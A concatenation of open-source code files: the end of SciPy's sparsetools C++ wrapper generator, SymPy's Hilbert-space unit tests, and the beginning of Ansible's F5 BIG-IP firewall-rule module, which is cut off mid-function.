bsr_transpose v iiiiIIT*I*I*T
bsr_matmat_pass2 v iiiiiIITIIT*I*I*T
bsr_matvec v iiiiIITT*T
bsr_matvecs v iiiiiIITT*T
bsr_elmul_bsr v iiiiIITIIT*I*I*T
bsr_eldiv_bsr v iiiiIITIIT*I*I*T
bsr_plus_bsr v iiiiIITIIT*I*I*T
bsr_minus_bsr v iiiiIITIIT*I*I*T
bsr_maximum_bsr v iiiiIITIIT*I*I*T
bsr_minimum_bsr v iiiiIITIIT*I*I*T
bsr_ne_bsr v iiiiIITIIT*I*I*B
bsr_lt_bsr v iiiiIITIIT*I*I*B
bsr_gt_bsr v iiiiIITIIT*I*I*B
bsr_le_bsr v iiiiIITIIT*I*I*B
bsr_ge_bsr v iiiiIITIIT*I*I*B
"""
# csc.h
CSC_ROUTINES = """
csc_diagonal v iiIIT*T
csc_tocsr v iiIIT*I*I*T
csc_matmat_pass1 v iiIIII*I
csc_matmat_pass2 v iiIITIIT*I*I*T
csc_matvec v iiIITT*T
csc_matvecs v iiiIITT*T
csc_elmul_csc v iiIITIIT*I*I*T
csc_eldiv_csc v iiIITIIT*I*I*T
csc_plus_csc v iiIITIIT*I*I*T
csc_minus_csc v iiIITIIT*I*I*T
csc_maximum_csc v iiIITIIT*I*I*T
csc_minimum_csc v iiIITIIT*I*I*T
csc_ne_csc v iiIITIIT*I*I*B
csc_lt_csc v iiIITIIT*I*I*B
csc_gt_csc v iiIITIIT*I*I*B
csc_le_csc v iiIITIIT*I*I*B
csc_ge_csc v iiIITIIT*I*I*B
"""
# csr.h
CSR_ROUTINES = """
csr_matmat_pass1 v iiIIII*I
csr_matmat_pass2 v iiIITIIT*I*I*T
csr_diagonal v iiIIT*T
csr_tocsc v iiIIT*I*I*T
csr_tobsr v iiiiIIT*I*I*T
csr_matvec v iiIITT*T
csr_matvecs v iiiIITT*T
csr_elmul_csr v iiIITIIT*I*I*T
csr_eldiv_csr v iiIITIIT*I*I*T
csr_plus_csr v iiIITIIT*I*I*T
csr_minus_csr v iiIITIIT*I*I*T
csr_maximum_csr v iiIITIIT*I*I*T
csr_minimum_csr v iiIITIIT*I*I*T
csr_ne_csr v iiIITIIT*I*I*B
csr_lt_csr v iiIITIIT*I*I*B
csr_gt_csr v iiIITIIT*I*I*B
csr_le_csr v iiIITIIT*I*I*B
csr_ge_csr v iiIITIIT*I*I*B
csr_scale_rows v iiII*TT
csr_scale_columns v iiII*TT
csr_sort_indices v iI*I*T
csr_eliminate_zeros v ii*I*I*T
csr_sum_duplicates v ii*I*I*T
get_csr_submatrix v iiIITiiii*V*V*W
csr_sample_values v iiIITiII*T
csr_count_blocks i iiiiII
csr_sample_offsets i iiIIiII*I
expandptr v iI*I
test_throw_error i
csr_has_sorted_indices i iII
csr_has_canonical_format i iII
"""
# coo.h, dia.h, csgraph.h
OTHER_ROUTINES = """
coo_tocsr v iiiIIT*I*I*T
coo_tocsc v iiiIIT*I*I*T
coo_todense v iiiIIT*Ti
coo_matvec v iIITT*T
coo_count_diagonals i iII
dia_matvec v iiiiITT*T
cs_graph_components i iII*I
"""
# List of compilation units
COMPILATION_UNITS = [
('bsr', BSR_ROUTINES),
('csr', CSR_ROUTINES),
('csc', CSC_ROUTINES),
('other', OTHER_ROUTINES),
]
#
# List of the supported index typenums and the corresponding C++ types
#
I_TYPES = [
('NPY_INT32', 'npy_int32'),
('NPY_INT64', 'npy_int64'),
]
#
# List of the supported data typenums and the corresponding C++ types
#
T_TYPES = [
('NPY_BOOL', 'npy_bool_wrapper'),
('NPY_BYTE', 'npy_byte'),
('NPY_UBYTE', 'npy_ubyte'),
('NPY_SHORT', 'npy_short'),
('NPY_USHORT', 'npy_ushort'),
('NPY_INT', 'npy_int'),
('NPY_UINT', 'npy_uint'),
('NPY_LONG', 'npy_long'),
('NPY_ULONG', 'npy_ulong'),
('NPY_LONGLONG', 'npy_longlong'),
('NPY_ULONGLONG', 'npy_ulonglong'),
('NPY_FLOAT', 'npy_float'),
('NPY_DOUBLE', 'npy_double'),
('NPY_LONGDOUBLE', 'npy_longdouble'),
('NPY_CFLOAT', 'npy_cfloat_wrapper'),
('NPY_CDOUBLE', 'npy_cdouble_wrapper'),
('NPY_CLONGDOUBLE', 'npy_clongdouble_wrapper'),
]
#
# Code templates
#
THUNK_TEMPLATE = """
static Py_ssize_t %(name)s_thunk(int I_typenum, int T_typenum, void **a)
{
%(thunk_content)s
}
"""
METHOD_TEMPLATE = """
NPY_VISIBILITY_HIDDEN PyObject *
%(name)s_method(PyObject *self, PyObject *args)
{
return call_thunk('%(ret_spec)s', "%(arg_spec)s", %(name)s_thunk, args);
}
"""
GET_THUNK_CASE_TEMPLATE = """
static int get_thunk_case(int I_typenum, int T_typenum)
{
%(content)s;
return -1;
}
"""
#
# Code generation
#
def get_thunk_type_set():
"""
Get a list containing cartesian product of data types, plus a getter routine.
Returns
-------
i_types : list [(j, I_typenum, None, I_type, None), ...]
Pairing of index type numbers and the corresponding C++ types,
and an unique index `j`. This is for routines that are parameterized
only by I but not by T.
it_types : list [(j, I_typenum, T_typenum, I_type, T_type), ...]
Same as `i_types`, but for routines parameterized both by T and I.
getter_code : str
C++ code for a function that takes I_typenum, T_typenum and returns
the unique index corresponding to the lists, or -1 if no match was
found.
"""
it_types = []
i_types = []
j = 0
getter_code = " if (0) {}"
for I_typenum, I_type in I_TYPES:
piece = """
else if (I_typenum == %(I_typenum)s) {
if (T_typenum == -1) { return %(j)s; }"""
getter_code += piece % dict(I_typenum=I_typenum, j=j)
i_types.append((j, I_typenum, None, I_type, None))
j += 1
for T_typenum, T_type in T_TYPES:
piece = """
else if (T_typenum == %(T_typenum)s) { return %(j)s; }"""
getter_code += piece % dict(T_typenum=T_typenum, j=j)
it_types.append((j, I_typenum, T_typenum, I_type, T_type))
j += 1
getter_code += """
}"""
return i_types, it_types, GET_THUNK_CASE_TEMPLATE % dict(content=getter_code)
def parse_routine(name, args, types):
"""
Generate thunk and method code for a given routine.
Parameters
----------
name : str
Name of the C++ routine
args : str
Argument list specification (in format explained above)
types : list
List of types to instantiate, as returned `get_thunk_type_set`
"""
ret_spec = args[0]
arg_spec = args[1:]
def get_arglist(I_type, T_type):
"""
Generate argument list for calling the C++ function
"""
args = []
next_is_writeable = False
j = 0
for t in arg_spec:
const = '' if next_is_writeable else 'const '
next_is_writeable = False
if t == '*':
next_is_writeable = True
continue
elif t == 'i':
args.append("*(%s*)a[%d]" % (const + I_type, j))
elif t == 'I':
args.append("(%s*)a[%d]" % (const + I_type, j))
elif t == 'T':
args.append("(%s*)a[%d]" % (const + T_type, j))
elif t == 'B':
args.append("(npy_bool_wrapper*)a[%d]" % (j,))
elif t == 'V':
if const:
raise ValueError("'V' argument must be an output arg")
args.append("(std::vector<%s>*)a[%d]" % (I_type, j,))
elif t == 'W':
if const:
raise ValueError("'W' argument must be an output arg")
args.append("(std::vector<%s>*)a[%d]" % (T_type, j,))
else:
raise ValueError("Invalid spec character %r" % (t,))
j += 1
return ", ".join(args)
# Generate thunk code: a giant switch statement with different
# type combinations inside.
thunk_content = """int j = get_thunk_case(I_typenum, T_typenum);
switch (j) {"""
for j, I_typenum, T_typenum, I_type, T_type in types:
arglist = get_arglist(I_type, T_type)
if T_type is None:
dispatch = "%s" % (I_type,)
else:
dispatch = "%s,%s" % (I_type, T_type)
if 'B' in arg_spec:
dispatch += ",npy_bool_wrapper"
piece = """
case %(j)s:"""
if ret_spec == 'v':
piece += """
(void)%(name)s<%(dispatch)s>(%(arglist)s);
return 0;"""
else:
piece += """
return %(name)s<%(dispatch)s>(%(arglist)s);"""
thunk_content += piece % dict(j=j, I_type=I_type, T_type=T_type,
I_typenum=I_typenum, T_typenum=T_typenum,
arglist=arglist, name=name,
dispatch=dispatch)
thunk_content += """
default:
throw std::runtime_error("internal error: invalid argument typenums");
}"""
thunk_code = THUNK_TEMPLATE % dict(name=name,
thunk_content=thunk_content)
# Generate method code
method_code = METHOD_TEMPLATE % dict(name=name,
ret_spec=ret_spec,
arg_spec=arg_spec)
return thunk_code, method_code
def main():
p = optparse.OptionParser(usage=__doc__.strip())
p.add_option("--no-force", action="store_false",
dest="force", default=True)
options, args = p.parse_args()
names = []
i_types, it_types, getter_code = get_thunk_type_set()
# Generate *_impl.h for each compilation unit
for unit_name, routines in COMPILATION_UNITS:
thunks = []
methods = []
# Generate thunks and methods for all routines
for line in routines.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
try:
name, args = line.split(None, 1)
except ValueError:
raise ValueError("Malformed line: %r" % (line,))
args = "".join(args.split())
if 't' in args or 'T' in args:
thunk, method = parse_routine(name, args, it_types)
else:
thunk, method = parse_routine(name, args, i_types)
if name in names:
raise ValueError("Duplicate routine %r" % (name,))
names.append(name)
thunks.append(thunk)
methods.append(method)
# Produce output
dst = os.path.join(os.path.dirname(__file__),
'sparsetools',
unit_name + '_impl.h')
if newer(__file__, dst) or options.force:
print("[generate_sparsetools] generating %r" % (dst,))
with open(dst, 'w') as f:
write_autogen_blurb(f)
f.write(getter_code)
for thunk in thunks:
f.write(thunk)
for method in methods:
f.write(method)
else:
print("[generate_sparsetools] %r already up-to-date" % (dst,))
# Generate code for method struct
method_defs = ""
for name in names:
method_defs += "NPY_VISIBILITY_HIDDEN PyObject *%s_method(PyObject *, PyObject *);\n" % (name,)
method_struct = """\nstatic struct PyMethodDef sparsetools_methods[] = {"""
for name in names:
method_struct += """
{"%(name)s", (PyCFunction)%(name)s_method, METH_VARARGS, NULL},""" % dict(name=name)
method_struct += """
{NULL, NULL, 0, NULL}
};"""
# Produce sparsetools_impl.h
dst = os.path.join(os.path.dirname(__file__),
'sparsetools',
'sparsetools_impl.h')
if newer(__file__, dst) or options.force:
print("[generate_sparsetools] generating %r" % (dst,))
with open(dst, 'w') as f:
write_autogen_blurb(f)
f.write(method_defs)
f.write(method_struct)
else:
print("[generate_sparsetools] %r already up-to-date" % (dst,))
def write_autogen_blurb(stream):
stream.write("""\
/* This file is autogenerated by generate_sparsetools.py
* Do not edit manually or check into VCS.
*/
""")
if __name__ == "__main__":
main()
|
bsd-3-clause
|
amitjamadagni/sympy
|
sympy/physics/quantum/tests/test_hilbert.py
|
125
|
2513
|
from sympy.physics.quantum.hilbert import (
HilbertSpace, ComplexSpace, L2, FockSpace, TensorProductHilbertSpace,
DirectSumHilbertSpace, TensorPowerHilbertSpace
)
from sympy import Interval, oo, Symbol, sstr, srepr
def test_hilbert_space():
hs = HilbertSpace()
assert isinstance(hs, HilbertSpace)
assert sstr(hs) == 'H'
assert srepr(hs) == 'HilbertSpace()'
def test_complex_space():
c1 = ComplexSpace(2)
assert isinstance(c1, ComplexSpace)
assert c1.dimension == 2
assert sstr(c1) == 'C(2)'
assert srepr(c1) == 'ComplexSpace(Integer(2))'
n = Symbol('n')
c2 = ComplexSpace(n)
assert isinstance(c2, ComplexSpace)
assert c2.dimension == n
assert sstr(c2) == 'C(n)'
assert srepr(c2) == "ComplexSpace(Symbol('n'))"
assert c2.subs(n, 2) == ComplexSpace(2)
def test_L2():
b1 = L2(Interval(-oo, 1))
assert isinstance(b1, L2)
assert b1.dimension == oo
assert b1.interval == Interval(-oo, 1)
x = Symbol('x', real=True)
y = Symbol('y', real=True)
b2 = L2(Interval(x, y))
assert b2.dimension == oo
assert b2.interval == Interval(x, y)
assert b2.subs(x, -1) == L2(Interval(-1, y))
def test_fock_space():
f1 = FockSpace()
f2 = FockSpace()
assert isinstance(f1, FockSpace)
assert f1.dimension == oo
assert f1 == f2
def test_tensor_product():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1*hs2
assert isinstance(h, TensorProductHilbertSpace)
assert h.dimension == 2*n
assert h.spaces == (hs1, hs2)
h = hs2*hs2
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs2
assert h.exp == 2
assert h.dimension == n**2
f = FockSpace()
h = hs1*hs2*f
assert h.dimension == oo
def test_tensor_power():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1**2
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs1
assert h.exp == 2
assert h.dimension == 4
h = hs2**3
assert isinstance(h, TensorPowerHilbertSpace)
assert h.base == hs2
assert h.exp == 3
assert h.dimension == n**3
def test_direct_sum():
n = Symbol('n')
hs1 = ComplexSpace(2)
hs2 = ComplexSpace(n)
h = hs1 + hs2
assert isinstance(h, DirectSumHilbertSpace)
assert h.dimension == 2 + n
assert h.spaces == (hs1, hs2)
f = FockSpace()
h = hs1 + f + hs2
assert h.dimension == oo
assert h.spaces == (hs1, f, hs2)
|
bsd-3-clause
|
ujenmr/ansible
|
lib/ansible/modules/network/f5/bigip_firewall_rule.py
|
14
|
38983
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_firewall_rule
short_description: Manage AFM Firewall rules
description:
- Manages firewall rules in an AFM firewall policy. New rules will always be added to the
end of the policy. Rules can be re-ordered using the C(bigip_security_policy) module.
Rules can also be pre-ordered using the C(bigip_security_policy) module and then later
updated using the C(bigip_firewall_rule) module.
version_added: 2.7
options:
name:
description:
- Specifies the name of the rule.
required: True
parent_policy:
description:
- The policy which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
parent_rule_list:
description:
- The rule list which contains the rule to be managed.
- One of either C(parent_policy) or C(parent_rule_list) is required.
action:
description:
- Specifies the action for the firewall rule.
- When C(accept), allows packets with the specified source, destination,
and protocol to pass through the firewall. Packets that match the rule,
and are accepted, traverse the system as if the firewall is not present.
- When C(drop), drops packets with the specified source, destination, and
protocol. Dropping a packet is a silent action with no notification to
the source or destination systems. Dropping the packet causes the connection
to be retried until the retry threshold is reached.
- When C(reject), rejects packets with the specified source, destination,
and protocol. When a packet is rejected the firewall sends a destination
unreachable message to the sender.
- When C(accept-decisively), allows packets with the specified source,
destination, and protocol to pass through the firewall, and does not require
any further processing by any of the further firewalls. Packets that match
the rule, and are accepted, traverse the system as if the firewall is not
present. If the Rule List is applied to a virtual server, management IP,
or self IP firewall rule, then Accept Decisively is equivalent to Accept.
- When creating a new rule, if this parameter is not provided, the default is
C(reject).
choices:
- accept
- drop
- reject
- accept-decisively
status:
description:
- Indicates the activity state of the rule or rule list.
- When C(disabled), specifies that the rule or rule list does not apply at all.
- When C(enabled), specifies that the system applies the firewall rule or rule
list to the given context and addresses.
- When C(scheduled), specifies that the system applies the rule or rule list
according to the specified schedule.
- When creating a new rule, if this parameter is not provided, the default
is C(enabled).
choices:
- enabled
- disabled
- scheduled
schedule:
description:
- Specifies a schedule for the firewall rule.
- You configure schedules to define days and times when the firewall rule is
made active.
description:
description:
- The rule description.
irule:
description:
- Specifies an iRule that is applied to the rule.
- An iRule can be started when the firewall rule matches traffic.
protocol:
description:
- Specifies the protocol to which the rule applies.
- Protocols may be specified by either their name or numeric value.
- A special protocol value C(any) can be specified to match any protocol. The
numeric equivalent of this protocol is C(255).
source:
description:
- Specifies packet sources to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following source items. An IPv4 or IPv6 address, an IPv4
or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
address_list:
description:
- Specifies an existing address list.
address_range:
description:
- Specifies an address range.
country:
description:
- Specifies a country code.
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_list:
description:
- Specifes an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
destination:
description:
- Specifies packet destinations to which the rule applies.
- Leaving this field blank applies the rule to all addresses and all ports.
- You can specify the following destination items. An IPv4 or IPv6 address,
an IPv4 or IPv6 address range, geographic location, VLAN, address list, port,
port range, port list or address list.
- You can specify a mix of different types of items for the source address.
suboptions:
address:
description:
- Specifies a specific IP address.
address_list:
description:
- Specifies an existing address list.
address_range:
description:
- Specifies an address range.
country:
description:
- Specifies a country code.
port:
description:
- Specifies a single numeric port.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_list:
description:
- Specifes an existing port list.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
port_range:
description:
- Specifies a range of ports, which is two port values separated by
a hyphen. The port to the left of the hyphen should be less than the
port to the right.
- This option is only valid when C(protocol) is C(tcp)(6) or C(udp)(17).
logging:
description:
- Specifies whether logging is enabled or disabled for the firewall rule.
- When creating a new rule, if this parameter is not specified, the default
if C(no).
type: bool
rule_list:
description:
- Specifies an existing rule list to use in the rule.
- This parameter is mutually exclusive with many of the other individual-rule
specific settings. This includes C(logging), C(action), C(source),
C(destination), C(irule'), C(protocol) and C(logging).
icmp_message:
description:
- Specifies the Internet Control Message Protocol (ICMP) or ICMPv6 message
C(type) and C(code) that the rule uses.
- This parameter is only relevant when C(protocol) is either C(icmp)(1) or
C(icmpv6)(58).
suboptions:
type:
description:
- Specifies the type of ICMP message.
- You can specify control messages, such as Echo Reply (0) and Destination
Unreachable (3), or you can specify C(any) to indicate that the system
applies the rule for all ICMP messages.
- You can also specify an arbitrary ICMP message.
- The ICMP protocol contains definitions for the existing message type and
number pairs.
code:
description:
- Specifies the code returned in response to the specified ICMP message type.
- You can specify codes, each set appropriate to the associated type, such
as No Code (0) (associated with Echo Reply (0)) and Host Unreachable (1)
(associated with Destination Unreachable (3)), or you can specify C(any)
to indicate that the system applies the rule for all codes in response to
that specific ICMP message.
- You can also specify an arbitrary code.
- The ICMP protocol contains definitions for the existing message code and
number pairs.
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(state) is C(present), ensures that the rule exists.
- When C(state) is C(absent), ensures that the rule is removed.
choices:
- present
- absent
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = r'''
- name: Create a new rule in the foo firewall policy
bigip_firewall_rule:
name: foo
parent_policy: policy1
protocol: tcp
source:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- vlan: vlan1
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
destination:
- address: 1.2.3.4
- address: "::1"
- address_list: foo-list1
- address_range: 1.1.1.1-2.2.2.2
- country: US
- port: 22
- port_list: port-list1
- port_range: 80-443
irule: irule1
action: accept
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Create an ICMP specific rule
bigip_firewall_rule:
name: foo
protocol: icmp
icmp_message:
type: 0
source:
- country: US
action: drop
logging: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a new rule that is uses an existing rule list
bigip_firewall_rule:
name: foo
rule_list: rule-list1
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
param1:
description: The new param1 value of the resource.
returned: changed
type: bool
sample: true
param2:
description: The new param2 value of the resource.
returned: changed
type: str
sample: Foo is bar
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import fq_name
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import fq_name
class Parameters(AnsibleF5Parameters):
api_map = {
'ipProtocol': 'protocol',
'log': 'logging',
'icmp': 'icmp_message',
}
api_attributes = [
'irule',
'ipProtocol',
'log',
'schedule',
'status',
'destination',
'source',
'icmp',
'action',
'description',
]
returnables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
updatables = [
'logging',
'protocol',
'irule',
'source',
'destination',
'action',
'status',
'schedule',
'description',
'icmp_message',
]
protocol_map = {
'1': 'icmp',
'6': 'tcp',
'17': 'udp',
'58': 'icmpv6',
'255': 'any',
}
class ApiParameters(Parameters):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] == 'yes':
return True
return False
@property
def protocol(self):
if self._values['protocol'] is None:
return None
if self._values['protocol'] in self.protocol_map:
return self.protocol_map[self._values['protocol']]
return self._values['protocol']
@property
def source(self):
result = []
if self._values['source'] is None:
return None
v = self._values['source']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'vlans' in v:
result += [('vlan', x) for x in v['vlans']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', str(x['name'])) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
v = self._values['destination']
if 'addressLists' in v:
result += [('address_list', x) for x in v['addressLists']]
if 'geo' in v:
result += [('geo', x['name']) for x in v['geo']]
if 'addresses' in v:
result += [('address', x['name']) for x in v['addresses']]
if 'ports' in v:
result += [('port', x['name']) for x in v['ports']]
if 'portLists' in v:
result += [('port_list', x) for x in v['portLists']]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = [x['name'] for x in self._values['icmp_message']]
return result
class ModuleParameters(Parameters):
@property
def irule(self):
if self._values['irule'] is None:
return None
if self._values['irule'] == '':
return ''
return fq_name(self.partition, self._values['irule'])
@property
def description(self):
if self._values['description'] is None:
return None
if self._values['description'] == '':
return ''
return self._values['description']
@property
def schedule(self):
if self._values['schedule'] is None:
return None
if self._values['schedule'] == '':
return ''
return fq_name(self.partition, self._values['schedule'])
@property
def source(self):
result = []
if self._values['source'] is None:
return None
for x in self._values['source']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'vlan' in x and x['vlan'] is not None:
result += [('vlan', fq_name(self.partition, x['vlan']))]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def destination(self):
result = []
if self._values['destination'] is None:
return None
for x in self._values['destination']:
if 'address' in x and x['address'] is not None:
result += [('address', x['address'])]
elif 'address_range' in x and x['address_range'] is not None:
result += [('address', x['address_range'])]
elif 'address_list' in x and x['address_list'] is not None:
result += [('address_list', x['address_list'])]
elif 'country' in x and x['country'] is not None:
result += [('geo', x['country'])]
elif 'port' in x and x['port'] is not None:
result += [('port', str(x['port']))]
elif 'port_range' in x and x['port_range'] is not None:
result += [('port', x['port_range'])]
elif 'port_list' in x and x['port_list'] is not None:
result += [('port_list', fq_name(self.partition, x['port_list']))]
if result:
return result
return None
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
type = x.get('type', '255')
code = x.get('code', '255')
if type is None or type == 'any':
type = '255'
if code is None or code == 'any':
code = '255'
if type == '255' and code == '255':
result.append("255")
elif type == '255' and code != '255':
raise F5ModuleError(
"A type of 'any' (255) requires a code of 'any'."
)
elif code == '255':
result.append(type)
else:
result.append('{0}:{1}'.format(type, code))
result = list(set(result))
return result
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
result[returnable] = getattr(self, returnable)
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
@property
def logging(self):
if self._values['logging'] is None:
return None
if self._values['logging'] is True:
return "yes"
return "no"
@property
def source(self):
if self._values['source'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['source']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'vlan':
result['vlans'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def destination(self):
if self._values['destination'] is None:
return None
result = dict(
addresses=[],
addressLists=[],
vlans=[],
geo=[],
ports=[],
portLists=[]
)
for x in self._values['destination']:
if x[0] == 'address':
result['addresses'].append({'name': x[1]})
elif x[0] == 'address_list':
result['addressLists'].append(x[1])
elif x[0] == 'geo':
result['geo'].append({'name': x[1]})
elif x[0] == 'port':
result['ports'].append({'name': str(x[1])})
elif x[0] == 'port_list':
result['portLists'].append(x[1])
return result
@property
def icmp_message(self):
if self._values['icmp_message'] is None:
return None
result = []
for x in self._values['icmp_message']:
result.append({'name': x})
return result
class ReportableChanges(Changes):
@property
def source(self):
if self._values['source'] is None:
return None
result = []
v = self._values['source']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['vlans']:
result += [('vlan', x) for x in v['vlans']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
@property
def destination(self):
if self._values['destination'] is None:
return None
result = []
v = self._values['destination']
if v['addressLists']:
result += [('address_list', x) for x in v['addressLists']]
if v['geo']:
result += [('geo', x['name']) for x in v['geo']]
if v['addresses']:
result += [('address', x['name']) for x in v['addresses']]
if v['ports']:
result += [('port', str(x)) for x in v['ports']]
if v['portLists']:
result += [('port_list', x['name']) for x in v['portLists']]
if result:
return dict(result)
return None
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
@property
def irule(self):
if self.want.irule is None:
return None
if self.have.irule is None and self.want.irule == '':
return None
if self.have.irule is None:
return self.want.irule
if self.want.irule != self.have.irule:
return self.want.irule
@property
def description(self):
if self.want.description is None:
return None
if self.have.description is None and self.want.description == '':
return None
if self.have.description is None:
return self.want.description
if self.want.description != self.have.description:
return self.want.description
@property
def source(self):
if self.want.source is None:
return None
if self.want.source is None and self.have.source is None:
return None
if self.have.source is None:
return self.want.source
if set(self.want.source) != set(self.have.source):
return self.want.source
@property
def destination(self):
if self.want.destination is None:
return None
if self.want.destination is None and self.have.destination is None:
return None
if self.have.destination is None:
return self.want.destination
if set(self.want.destination) != set(self.have.destination):
return self.want.destination
@property
def icmp_message(self):
if self.want.icmp_message is None:
return None
if self.want.icmp_message is None and self.have.icmp_message is None:
return None
if self.have.icmp_message is None:
return self.want.icmp_message
if set(self.want.icmp_message) != set(self.have.icmp_message):
return self.want.icmp_message
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.get('module', None)
self.client = kwargs.get('client', None)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
def _set_changed_options(self):
changed = {}
for key in Parameters.returnables:
if getattr(self.want, key) is not None:
changed[key] = getattr(self.want, key)
if changed:
self.changes = UsableChanges(params=changed)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def exec_module(self):
changed = False
result = dict()
state = self.want.state
if state == "present":
changed = self.present()
elif state == "absent":
changed = self.absent()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.client.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def present(self):
if self.exists():
return self.update()
else:
return self.create()
def exists(self):
if self.want.parent_policy:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/policy/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
transform_name(self.want.partition, self.want.parent_policy),
self.want.name
)
else:
uri = "https://{0}:{1}/mgmt/tm/security/firewall/rule-list/{2}/rules/{3}".format(
self.client.provider['server'],
self.client.provider['server_port'],
